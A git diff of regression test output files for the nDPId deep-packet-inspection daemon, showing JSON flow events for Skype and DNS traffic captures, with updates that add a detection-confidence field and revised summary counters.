-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969745776,"flow_last_seen":1431969747554,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49511,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969745776,"flow_last_seen":1431969747554,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49511,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","total-events-serialized":1634}
+00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","total-events-serialized":1633}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 3284/3069
 ~~ skipped flows.............: 0
 ~~ total layer4 data length..: 444195 bytes
-~~ total detected protocols..: 201
+~~ total detected protocols..: 200
 ~~ total active/idle flows...: 293/293
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5484040 bytes
-~~ total memory freed........: 5484040 bytes
-~~ total allocations/frees...: 103866/103866
+~~ total memory allocated....: 5436593 bytes
+~~ total memory freed........: 5436593 bytes
+~~ total allocations/frees...: 105456/105456
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 1766 chars
diff --git a/test/results/skype_no_unknown.pcap.out b/test/results/skype_no_unknown.pcap.out
index df87396cf..441ecebad 100644
--- a/test/results/skype_no_unknown.pcap.out
+++ b/test/results/skype_no_unknown.pcap.out
@@ -1,72 +1,72 @@
 00448{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"skype_no_unknown.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00542{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970632290,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431970632290,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"ts_msec":1431970632290,"pkt":"AQBeAAAWJKQ8\/kzXCABGwAAoAABAAAECQXbAqAHb4AAAFpQEAAAiADajAAAAAQIAAADpWbwBAAAAAAAA"}
-00575{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970632290,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970632290,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431970634276,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970634276,"pkt":"0NQSxnP1PBXCt3IOCABFAABAj1gAAEARZ+HAqAEiwKgBAdb0ADUALMTUeDABAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAAQAB"}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1431970634276,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970634276,"pkt":"0NQSxnP1PBXCt3IOCABFAABAlRoAAEARYh\/AqAEiwKgBAf3LADUALKDXdTsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAHAAB"}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634431,"flow_last_seen":1431970634431,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970634431,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1431970634431,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1431970634431,"pkt":"0NQSxnP1PBXCt3IOCABFAABDXEcAAEARmu\/AqAEiwKgBAe0QADUAL\/kqxMsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634431,"flow_last_seen":1431970634431,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970634431,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634431,"flow_last_seen":1431970634431,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970634431,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60688,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634432,"flow_last_seen":1431970634432,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970634432,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1431970634432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1431970634432,"pkt":"0NQSxnP1PBXCt3IOCABFAABDrh8AAEARSRfAqAEiwKgBAeUHADUAL+4jvNsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634432,"flow_last_seen":1431970634432,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970634432,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634432,"flow_last_seen":1431970634432,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431970634432,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634589,"flow_last_seen":1431970634589,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970634589,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1431970634589,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970634589,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7UlwAAEARpOLAqAEiwKgBAfrwADUAJ8Zq760BAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="}
-00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634589,"flow_last_seen":1431970634589,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970634589,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634589,"flow_last_seen":1431970634589,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970634589,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64240,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634591,"flow_last_seen":1431970634591,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970634591,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1431970634591,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970634591,"pkt":"0NQSxnP1PBXCt3IOCABFAAA75y8AAEAREA\/AqAEiwKgBAcLIADUAJ6plKNsBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634591,"flow_last_seen":1431970634591,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970634591,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49864,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
